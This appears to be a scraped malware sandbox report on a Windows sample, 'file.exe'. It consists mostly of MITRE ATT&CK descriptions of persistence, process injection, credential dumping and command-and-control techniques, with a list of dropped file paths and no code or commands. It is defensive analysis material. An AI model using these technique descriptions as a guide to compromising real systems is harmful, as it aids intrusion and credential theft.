Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Protection of GUI

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AFIDGDBGCAAF\AAAAKJ

C:\ProgramData\AFIDGDBGCAAF\AAEHJE

C:\ProgramData\AFIDGDBGCAAF\AAKKFHCFI

C:\ProgramData\AFIDGDBGCAAF\AFCBFI

C:\ProgramData\AFIDGDBGCAAF\BAKEBA

C:\ProgramData\AFIDGDBGCAAF\BGHJEB

C:\ProgramData\AFIDGDBGCAAF\CAEBGH

C:\ProgramData\AFIDGDBGCAAF\CBAFID

C:\ProgramData\AFIDGDBGCAAF\CFCGII

C:\ProgramData\AFIDGDBGCAAF\CFHDBF

C:\ProgramData\AFIDGDBGCAAF\CGHCFB

C:\ProgramData\AFIDGDBGCAAF\DAAAKF

C:\ProgramData\AFIDGDBGCAAF\DAEBKK

C:\ProgramData\AFIDGDBGCAAF\DAEHJJ

Windows Analysis Report
file.exe

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre